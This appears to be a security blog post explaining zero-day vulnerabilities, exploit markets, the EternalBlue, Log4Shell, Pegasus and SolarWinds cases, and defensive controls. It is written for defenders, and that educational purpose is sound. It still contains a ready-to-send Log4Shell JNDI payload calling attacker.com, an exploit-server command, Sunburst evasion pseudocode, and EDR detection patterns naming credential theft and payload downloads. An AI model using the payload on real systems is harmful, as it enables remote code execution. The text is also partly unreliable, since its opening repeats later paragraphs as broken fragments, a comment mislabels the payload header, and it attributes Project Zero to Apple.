Zero-day vulnerabilities are commodities. The market for them is structured, multi-tiered, and involves buyers ranging from well-intentioned security researchers to authoritarian governments. Major technology companies pay security researchers to report vulnerabilities responsibly. Payouts are public and some are substantial: Apple Security Research:

Zero-Day Vulnerabilities: What They Are and Why They Matter

Q: Defining Zero-Day Precisely

A zero-day vulnerability is a security flaw that the software vendor is unaware of. The "zero" refers to the number of days the vendor has had to address it: zero. There is no patch. No workaround advisory. No vendor acknowledgment. Defenders are flying blind. A zero-day exploit is a working attack tool that reliably leverages a zero-day vulnerability. Having a vulnerability isn't the same as having an exploit — turning a bug into reliable, weaponizable attack code is a separate and often significant engineering effort. The moment a vendor becomes aware of the vulnerability — whether through researcher disclosure, internal discovery, or intelligence reporting — the clock starts. The vulnerability technically stops being "zero-day," though the window between vendor awareness and widespread patch deployment is still a dangerous exposure period.

Q: Case Studies: Zero-Days That Changed History

What it was: A critical remote code execution vulnerability in Windows' SMBv1 (Server Message Block) protocol implementation. Any Windows machine with SMB exposed on port 445 could be compromised without authentication — no user interaction, no credentials, no foothold required. Who found it: The NSA's Tailored Access Operations (TAO) group. They developed a working exploit called EternalBlue and kept it classified for an estimated 5 years, using it against intelligence targets. How it leaked: In August 2016, a group calling themselves "The Shadow Brokers" began releasing NSA hacking tools. In April 2017, they released EternalBlue publicly. The consensus attribution: the Shadow Brokers obtained EternalBlue after NSA operators accidentally left it on a staging server that was later compromised by another nation-state actor (likely Russia).

In February 2021, researchers at Citizen Lab discovered that the iPhone of Al-Jazeera journalist Tamer Almisshal had been silently compromised without any interaction on his part. No suspicious link clicked. No attachment opened. His phone received an invisible iMessage attachment, and that was enough. NSO Group's Pegasus spyware had gained complete access to his encrypted messages, camera, microphone, and real-time location — on a fully patched iOS 14 device. The exploit used was a zero-click zero-day worth millions of dollars on the open market.

Zero-day vulnerabilities sit at the intersection of intelligence tradecraft, criminal enterprise, and corporate negligence. They are simultaneously the most glamorized and most misunderstood concept in cybersecurity. This post cuts through the mythology to explain what zero-days actually are, how the market for them works, which ones have caused the most damage, and — critically — what defenders can actually do about a threat class where the conventional advice ("just patch it") is definitionally inapplicable.

Defining Zero-Day Precisely

A zero-day vulnerability is a security flaw that the software vendor is unaware of. The "zero" refers to the number of days the vendor has had to address it: zero. There is no patch. No workaround advisory. No vendor acknowledgment. Defenders are flying blind.

A zero-day exploit is a working attack tool that reliably leverages a zero-day vulnerability. Having a vulnerability isn't the same as having an exploit — turning a bug into reliable, weaponizable attack code is a separate and often significant engineering effort.

The moment a vendor becomes aware of the vulnerability — whether through researcher disclosure, internal discovery, or intelligence reporting — the clock starts. The vulnerability technically stops being "zero-day," though the window between vendor awareness and widespread patch deployment is still a dangerous exposure period.

N-day vulnerabilities are published bugs with available patches that organizations haven't deployed. This is where the vast majority of real-world exploitation occurs. The Colonial Pipeline ransomware attack in May 2021 (temporary fuel shortage across the US East Coast, $4.4 million ransom paid) exploited a VPN vulnerability with a published CVE and an available patch. The attackers didn't need a zero-day — they just needed an organization that hadn't patched a known critical vulnerability.

The distinction matters for risk analysis: true zero-days require nation-state-level resources or an underground market purchase. N-day vulnerabilities require Google and a week of patience.

The Vulnerability Lifecycle

Every vulnerability follows a lifecycle with a defined window of risk at each stage:

[Introduction]
Developer introduces code containing a flaw
↓ (weeks to years pass — vulnerability exists but is unknown)
[Discovery]
Someone finds the flaw:
  → Security researcher: likely coordinated disclosure
  → Internal audit: likely internal fix without public disclosure
  → Bug bounty hunter: monetized via bug bounty program
  → Threat actor: monetized via exploitation or sale
↓
[Weaponization]
Working exploit code is developed
This step is non-trivial — requires significant reverse engineering skill
A proof-of-concept ≠ a reliable weaponized exploit
↓
[Disclosure / Use]
Path A: Responsible Disclosure → vendor patches → public disclosure (CVD process)
Path B: 0-day sale → buyer uses it silently until discovered
Path C: Public 1-day — disclosed without vendor coordination, immediate exploitation
↓
[Patch Release]
Vendor ships a fix
For major vendors: hours to months depending on severity and complexity
↓
[Patch Deployment]
Organizations install the patch
Enterprise patch cycles: 30-90 days average; often never for forgotten systems
This is where most N-day exploitation occurs
↓
[Remediation Complete]
Vulnerability no longer exploitable at scale
(Some legacy systems remain permanently unpatched)

The window of maximum attacker advantage is between discovery by a threat actor and widespread patch deployment by defenders. For a true zero-day sold to a sophisticated government buyer, that window may be years. For a publicly disclosed critical CVE, the practical exploitation window shrinks to hours (when a well-funded attacker reverse-engineers the patch) to weeks (when a commodity exploit appears in Metasploit).

The Zero-Day Market

Zero-day vulnerabilities are commodities. The market for them is structured, multi-tiered, and involves buyers ranging from well-intentioned security researchers to authoritarian governments.

Bug Bounty Programs: The Clean End

Major technology companies pay security researchers to report vulnerabilities responsibly. Payouts are public and some are substantial:

Apple Security Research:

Zero-click remote code execution with kernel privileges on iOS: up to $1,000,000
Zero-click full chain with persistence: up to $1,000,000
Network access kernel code execution: up to $250,000
Data access without user interaction: up to $100,000

Google Bug Hunters (Chrome):

Memory corruption in V8: typically $20,000-$85,000
Full browser RCE with sandbox escape: up to $250,000
Total paid out: over $50 million since 2010

Microsoft MSRC:

Critical RCE in Microsoft products: up to $250,000
Hyper-V escape: up to $250,000

Bug bounties create an incentive structure where disclosure to the vendor is more profitable than selling to the underground market — for researchers who care about legality and ethics. The limitation: for an iOS zero-click chain, Zerodium's public price list was $2.5 million. Apple's top payout is $1 million. The market premium for silence is real.

Government and Intelligence Agencies: The Gray Market

Nation-states purchase zero-day exploits through direct contracts with private companies and through brokers. Key players:

Zerodium (US-based): Publicly lists acquisition prices and re-sells to government customers. Their 2024 price list included:

iOS zero-click remote jailbreak: $2,500,000
Android zero-click: $2,500,000
Chrome/Safari full chain with sandbox escape: $500,000
Microsoft Office/365 RCE: $500,000
Windows local privilege escalation: $400,000

These prices represent what Zerodium will pay researchers. They sell to government customers at a markup. The buyers: NSA, CIA, GCHQ, BND, DGSE, and equivalent agencies worldwide.

Crowdfense (UAE): Similar broker model with similar or higher acquisition prices.

NSO Group (Israel): Develops and sells end-to-end surveillance capability (not just exploits) to government customers. Pegasus is their flagship product — a full mobile device surveillance platform built on zero-day iOS and Android exploits.

The argument for this market: Intelligence agencies have legitimate needs for offensive cyber capabilities. Stockpiling zero-days for authorized intelligence collection is legal in most jurisdictions and arguably necessary for national security missions.

The counter-argument: Government-stockpiled zero-days have repeatedly leaked. EternalBlue (NSA) caused WannaCry and NotPetya. The Vault 7 CIA toolset leaked via WikiLeaks. Every government zero-day stockpile is a potential future catastrophic disclosure.

Underground Markets: The Criminal End

On darknet forums, private Telegram channels, and through brokers who don't ask about buyers' intentions:

Exploit pricing in underground markets (2024-2025 observed listings):

Pulse Secure VPN RCE (0-day): $1.2 million
Fortinet FortiGate zero-day: $800,000
VMware ESXi zero-day: $600,000
Windows kernel LPE (zero-day): $200,000-$400,000
Active Directory attack chain with persistence: $150,000-$300,000
Chrome 0-day (renderer only, no sandbox escape): $100,000

Ransomware affiliates use N-days (not zero-days — the cost is prohibitive for most ransomware groups). The exception: sophisticated, well-funded groups like ALPHV/BlackCat have been observed using exploits close to zero-day timeline. The economics require a target with a sufficiently large ransom potential to justify the tool cost.

Case Studies: Zero-Days That Changed History

EternalBlue (MS17-010) — The Most Consequential Leaked Zero-Day

What it was: A critical remote code execution vulnerability in Windows' SMBv1 (Server Message Block) protocol implementation. Any Windows machine with SMB exposed on port 445 could be compromised without authentication — no user interaction, no credentials, no foothold required.

Who found it: The NSA's Tailored Access Operations (TAO) group. They developed a working exploit called EternalBlue and kept it classified for an estimated 5 years, using it against intelligence targets.

How it leaked: In August 2016, a group calling themselves "The Shadow Brokers" began releasing NSA hacking tools. In April 2017, they released EternalBlue publicly. The consensus attribution: the Shadow Brokers obtained EternalBlue after NSA operators accidentally left it on a staging server that was later compromised by another nation-state actor (likely Russia).

Microsoft's response: Microsoft released MS17-010 patching the SMBv1 vulnerability on March 14, 2017 — one month before the Shadow Brokers released EternalBlue publicly.

What happened after:

WannaCry (May 12, 2017): The Lazarus Group (North Korea) deployed a ransomware worm using EternalBlue. Infected 200,000+ machines across 150 countries in 72 hours. The UK's NHS was devastated — hospitals diverted ambulances, operations were cancelled, doctors resorted to pen and paper. Total estimated global damage: $4-8 billion. WannaCry had a design flaw (a killswitch domain that researcher Marcus Hutchins registered) that limited its spread; without it, the damage would have been far greater.

NotPetya (June 27, 2017): Russia's GRU deployed what appeared to be ransomware but was actually a destructive wiper designed to destroy data rather than extract ransom. Primary target: Ukraine. Collateral damage: global. The shipping company Maersk lost all its data, requiring complete IT infrastructure rebuild — 45,000 PCs, 4,000 servers, 2,500 applications. Total cost to Maersk alone: $300 million. Global total: estimated $10 billion — the costliest cyberattack in history at the time.

What EternalBlue teaches us: Government zero-day stockpiles are liabilities. The NSA knew about MS17-010, chose not to disclose it for years, and when it leaked, the resulting tools caused more damage than any disclosed vulnerability in history. The patch was available for a month before WannaCry — the damage was entirely due to organizations that hadn't applied a critical patch in time.

Log4Shell (CVE-2021-44228) — Universal Exposure Meets Trivial Exploitation

What it was: A remote code execution vulnerability in Log4j 2, a Java logging library so widely embedded in enterprise software that CISA Director Jen Easterly called it "the most serious vulnerability I have seen in my decades-long career."

The technical detail: Log4j 2's "message lookup substitution" feature allowed the library to perform JNDI (Java Naming and Directory Interface) lookups when it logged certain strings. If an attacker could get a vulnerable application to log a string like ${jndi:ldap://attacker.com/exploit}, Log4j would make an outbound connection to the attacker's LDAP server and load and execute a Java class returned by that server. Remote code execution with nothing more than getting text logged.

Discovery and disclosure: Alibaba Cloud security researcher Chen Zhaojun privately reported the vulnerability to Apache on November 24, 2021. A patch was published December 10, 2021. By then, proof-of-concept code was already circulating. Within hours of public disclosure, mass exploitation began.

Who exploited it and when:

Nation-state actors (Iranian, Chinese, North Korean, Russian) within days
Ransomware affiliates (Conti, TellYouThePass) within a week
Crypto miners within hours
Over 100 distinct threat actors within two weeks of disclosure

The scale problem: Log4j is a transitive dependency — thousands of applications include it not directly but through other libraries. Many organizations had no software bill of materials and didn't know which of their applications used Log4j. The remediation effort required discovering affected systems, not just patching them.

Technical exploitation example:

# The simplest possible Log4Shell payload
# Any field that gets logged is a potential injection point:
# - HTTP headers (User-Agent, X-Forwarded-For, Referer)
# - Login form fields (username, email)
# - Search queries
# - Custom HTTP headers
# - API parameters
 
# Set up a JNDI server on attacker-controlled infrastructure
# python3-based marshalsec or JNDIExploit
java -jar JNDIExploit.jar -i attacker.com -p 8888
 
# The payload — sent as the User-Agent header:
curl -H 'X-Api-Version: ${jndi:ldap://attacker.com:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZA==}' \
  https://vulnerable.target.com/
 
# Base64 decodes to: touch /tmp/pwned
# When the server logs the X-Api-Version header, Log4j processes the JNDI string
# The server connects to attacker.com, loads and executes the Java class
# In this case, creates /tmp/pwned — demonstrating RCE

Defender's lesson: A critical vulnerability in a single widely-used library can affect thousands of applications simultaneously, including applications whose vendors weren't aware they used the library. Software supply chain visibility (SBOM) is not optional — you cannot remediate what you can't inventory.

Pegasus (NSO Group) — Commercial Zero-Click Surveillance at Scale

What it is: Pegasus is a full-featured mobile surveillance platform sold by Israeli firm NSO Group to government customers. It has, over its operational life, exploited iOS and Android vulnerabilities including:

Trident (2016): Three chained iOS zero-days (CVE-2016-4655, CVE-2016-4656, CVE-2016-4657) allowing remote jailbreak via a malicious link. Discovered when UAE human rights defender Ahmed Mansoor received a suspicious SMS.
KISMET (2020): iOS zero-click vulnerability in iMessage's IMAGIO library. No user interaction required.
FORCEDENTRY (CVE-2021-30860): iOS zero-click vulnerability in the JBIG2 image compression decoder. Exploited using a PDF-based attack delivered via iMessage. The technical sophistication: the exploit used a logic bug in JBIG2's compression algorithm to construct a primitive that allowed arbitrary memory writes, ultimately achieving code execution. Apple's Project Zero team described it as "one of the most technically sophisticated exploits we've ever seen."

Documented targets:

Journalists (including Jamal Khashoggi associates, Jeff Bezos)
Human rights defenders
Opposition politicians
Heads of state (Emmanuel Macron's phone was on a list of Pegasus targets)
Lawyers representing Pegasus victims

Detection (after the fact): Amnesty International's Security Lab developed MVT (Mobile Verification Toolkit) for iOS and Android forensics:

# Install MVT
pip3 install mvt
 
# For iOS — requires a full device backup
mvt-ios check-backup --iocs ~/stix2/pegasus.stix2 /path/to/ios/backup
 
# For iOS filesystem (requires jailbroken device or advanced extraction)
mvt-ios check-fs --iocs ~/stix2/pegasus.stix2 /path/to/extracted/filesystem
 
# For Android — ADB-based analysis
adb backup -apk -shared -all -f android_backup.ab
mvt-android check-adb --iocs ~/stix2/pegasus.stix2
 
# IOC feeds for Pegasus
# Citizen Lab maintains a list of known Pegasus domains/infrastructure
# https://github.com/AmnestyTech/investigations — Amnesty IOC repository

What Pegasus demonstrates: A sufficiently funded, motivated adversary with zero-click zero-days can compromise any device regardless of security hygiene. There is currently no reliable defense against a zero-click zero-day attack from a nation-state-level adversary targeting your specific device. The controls below reduce risk but cannot eliminate it at this threat tier.

SolarWinds Orion (Sunburst) — Build Pipeline Supply Chain Attack

What it was: Not a zero-day in the traditional sense — but a supply chain attack that effectively created a zero-day for every organization using SolarWinds Orion software. Russian intelligence (SVR, tracked as APT29/Cozy Bear) compromised SolarWinds' software build pipeline and injected backdoored code (Sunburst) into the Orion software update. The trojanized update was cryptographically signed by SolarWinds and distributed through their official update mechanism.

Timeline:

October 2019: SVR first compromises SolarWinds build environment (test run)
March 2020: Malicious code injected into Orion build
March-June 2020: Sunburst-infected Orion 2020.2 distributed to 18,000+ customers
December 13, 2020: FireEye discovers the backdoor (only because they noticed their own tools being exfiltrated)
December 13, 2020: Emergency disclosure to US government and public

What Sunburst did:

# Simplified representation of Sunburst's behavior
# Actual code was significantly obfuscated
 
# 1. Wait 12-14 days after installation before any C2 contact (avoid sandbox detection)
import time
time.sleep(random.randint(12 * 86400, 14 * 86400))
 
# 2. Check environment — don't run if security tools present
import subprocess
blocked_processes = ['windbg.exe', 'wireshark.exe', 'fiddler.exe', 'processhacker.exe']
for proc in blocked_processes:
    if proc in running_processes():
        exit()
 
# 3. Check domain — if machine is on a security company's domain, don't run
# This prevented accidental sandbox triggering at security vendors
blocked_domains = ['palo alto', 'fireeye', 'crowdstrike', 'dhl', 'cisco']
 
# 4. Initial DNS beacon for C2 communication
# Encoded hostname information in DNS queries to avsvmcloud.com (the C2 domain)
# DNS was chosen because it passes through most firewalls silently
# The encoded data included victim domain name — used to triage targets
 
# 5. After initial triage, only targeted high-value victims received follow-on tools

Confirmed victims: US Treasury, Commerce Department, State Department, DHS, NSC, parts of the Pentagon, Microsoft, VMware, FireEye, Intel, Cisco, Deloitte, and approximately 100 others specifically targeted (of 18,000 who installed the backdoor).

Estimated cost: $100 billion across all affected organizations when including incident response, remediation, and security upgrades.

Defensive Strategy: What You Can Actually Do

The uncomfortable truth: if a sophisticated nation-state is targeting your specific organization with a zero-click zero-day, the controls below are insufficient. You are not going to out-defend the NSA when they have a $2.5 million iOS exploit chain. Accept this and focus your defenses on what's actually achievable.

What's achievable:

1. Treat N-Days Like Zero-Days — Immediate Patching

The Equifax breach was 66 days after a publicly available patch. The Colonial Pipeline ransomware was an N-day VPN vulnerability. The majority of zero-day exploitation you'll see in practice is actually mature N-day exploitation against organizations that haven't patched.

# Subscribe to CISA's Known Exploited Vulnerabilities (KEV) catalog
# This is the definitive "patch this now" list — vulnerabilities confirmed in active exploitation
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json | \
  jq '.vulnerabilities | sort_by(.dateAdded) | reverse | .[0:10] | .[] | {cveID, vulnerabilityName, dateAdded, dueDate}'
 
# Check your environment against the KEV catalog
# nuclei has a KEV tag
nuclei -l targets.txt -t cves/ -tags kev -severity critical,high
 
# Priority patching order:
# 1. Internet-facing systems (VPN, firewalls, web applications, email gateways)
# 2. Privileged systems (domain controllers, jump servers, backup infrastructure)
# 3. Endpoint systems
# 4. Internal servers
 
# Target patch timelines by severity:
# Critical KEV: 24-72 hours for internet-facing systems
# Critical non-KEV: 7 days for internet-facing
# High severity: 14-30 days
# Medium: 30-90 days

2. Endpoint Detection and Response (EDR)

Zero-day exploits execute code, but that code has to do something observable: spawn processes, write files, make network connections, inject into other processes, modify registry keys. EDR platforms monitor these behaviors and flag anomalies.

Behavioral patterns EDR catches even for zero-day exploits:
- Browser renderer process spawning cmd.exe or powershell.exe
- Word/Excel spawning network connections
- A typically-silent process making outbound connections
- Legitimate process reading LSASS memory (credential theft)
- Process injecting into another process's memory
- Unsigned executables running from temp directories
- Living-off-the-land binaries used in unusual contexts (e.g., certutil downloading payloads)

Modern EDR platforms: CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint, Palo Alto Cortex XDR. All use behavioral detection + machine learning, not signature databases. All stop the vast majority of commodity malware and many sophisticated attacks.

What EDR doesn't stop: Nation-state operators who have specifically researched and tested against your EDR platform develop tradecraft specifically to avoid behavioral detection. The vendors counter, the attackers adapt. It's an arms race. EDR shifts the equation toward the defender but doesn't guarantee protection.

3. Zero Trust Architecture

Zero trust eliminates the assumption that anything inside your network perimeter is safe. Every access request is authenticated, authorized, and verified regardless of origin.

Zero trust principles applied to zero-day defense:

[Identity verification]
└── Multi-factor authentication for all user access
└── Device trust validation (MDM enrollment, health attestation)
└── Phishing-resistant MFA (FIDO2/WebAuthn keys, not SMS or TOTP)

[Least privilege]
└── Users have access only to systems they need for their role
└── Service accounts have only necessary permissions
└── Just-in-time access for privileged operations
└── No standing admin access to sensitive systems

[Network segmentation]
└── East-west traffic restricted between segments
└── No flat internal network that an initial compromise can pivot across
└── Workstations can't directly reach servers
└── Servers can't directly reach domain controllers without explicit policy

[Continuous verification]
└── Session re-authentication for sensitive actions
└── Anomaly detection on user behavior
└── Device health checked per request (EDR status, patch level)

Why zero trust limits zero-day blast radius: If an attacker compromises a workstation via a browser zero-day, zero trust limits what that compromised workstation can reach. Without a flat internal network, lateral movement to domain controllers, databases, and backup systems requires additional exploitation steps — each of which generates observable signals.

4. Attack Surface Reduction

You cannot exploit a service that doesn't exist. Every unnecessary service, port, and feature is a potential zero-day delivery mechanism.

# Audit internet-facing attack surface from outside your network
# Use Shodan/Censys to see what you look like to an attacker
 
shodan search "org:\"Your Organization Name\""
# Review everything returned — every exposed service is a zero-day risk
 
# Check for:
# - Old VPN versions (Pulse Secure, Fortinet, Citrix — all had critical 0-days)
# - Remote desktop exposure (RDP on 3389 directly to internet = risk)
# - Legacy protocols (FTP, Telnet, RDP without NLA)
# - Development and test systems exposed to internet
# - Forgotten applications on non-standard ports
# - Kubernetes dashboards, Grafana, Jenkins without authentication
 
# Attack surface reduction actions:
# - Disable SMBv1 everywhere (EternalBlue)
# - Remove EOL systems from network or isolate them
# - Put VPNs and remote access behind MFA
# - Close all ports except required ones
# - Remove unused services from internet-facing systems
# - Implement application allowlisting on critical systems

5. Threat Intelligence Integration

Threat intelligence converts external knowledge about how attackers operate into detection capability before they reach you.

# Subscribe to threat intelligence feeds
# CISA: https://www.cisa.gov/topics/cyber-threats-and-advisories
# Microsoft MSTIC blog: https://www.microsoft.com/en-us/security/blog/
# Google Mandiant blog: https://www.mandiant.com/resources/blog
# CrowdStrike Adversary Intelligence: https://www.crowdstrike.com/blog/
# Palo Alto Unit42: https://unit42.paloaltonetworks.com/
 
# MITRE ATT&CK Navigator — visualize what techniques threat actors targeting your sector use
# https://mitre-attack.github.io/attack-navigator/
# Load a group (e.g., APT28, Lazarus Group) and see their TTP profile
# Map your current detections to identify coverage gaps
 
# OpenCTI — open-source threat intelligence platform for your own instance
# Ingests STIX/TAXII feeds, links indicators, maps to ATT&CK
docker-compose up -d  # Start OpenCTI stack
 
# MISP — Malware Information Sharing Platform
# Community-driven IOC sharing
# Connect to CIRCL, FS-ISAC, and sector-specific sharing communities

6. Isolation and Containment Architecture

Browser isolation: separate web browsing from the endpoint OS
├── Legitimate vectors for zero-day delivery: browser rendering engine bugs
├── Browser isolation: browsing happens in a remote container or VM
├── If browser is compromised, the attacker has a container/VM, not the endpoint
└── Commercial solutions: Menlo Security, Ericom Shield, Authentic8 Silo

Email attachment isolation:
├── Detonate attachments in a sandbox before delivering to the end user
├── Strip active content from PDFs and Office documents
└── Solutions: Perception Point, Proofpoint Targeted Attack Protection, Mimecast

Application allowlisting:
├── Only approved executables can run on endpoints
├── Zero-day payloads are unsigned, not on the allowlist → blocked
└── Solutions: CrowdStrike, Carbon Black, Microsoft AppLocker, Airlock Digital

The Realistic Threat Model

Be honest about who you are and who's coming for you:

Nation-state zero-day attacks target:

Defense contractors and cleared facilities
Critical infrastructure operators (energy, water, financial)
Pharmaceutical and biotech (IP theft)
Journalists and dissidents (Pegasus-type campaigns)
Government agencies and their supply chain

If you're in one of those categories: The controls above are mandatory, not aspirational. You should also consult CISA's emergency directives, engage with your sector's ISAC (Information Sharing and Analysis Center), consider a government-partnered threat intelligence relationship, and conduct red team exercises that specifically test zero-day-equivalent scenarios (assume breach with a fully patched system).

If you're not: Your realistic threat is a ransomware affiliate running a scan for unpatched Fortinet or Ivanti appliances, finding your VPN, and deploying Medusa or Play ransomware. This is not a zero-day attack. It is an N-day attack against a vulnerable internet-facing system. Your defense is: patch the VPN, put MFA in front of remote access, deploy EDR on endpoints, segment your network so ransomware can't reach backup systems.

The irony of zero-days is that they dominate the security industry's imagination while N-days dominate its incident response queue. The skill required to exploit a zero-day is orders of magnitude higher than the skill required to exploit an unpatched Citrix ADC or SolarWinds Serv-U. The economics of ransomware favor the lazier approach: find the unpatched appliance, mass deploy the ransomware, wait for the Bitcoin.

Defend against what's actually coming for you. Patch your systems, enforce MFA, deploy EDR, segment your network. These controls will stop or slow 95% of actual attacks. The remaining 5% requires additional controls and, ultimately, a capable incident response function — because against a sufficiently motivated nation-state adversary with adequate resources, the question is not "if" but "when you detect them and how quickly you can contain and recover."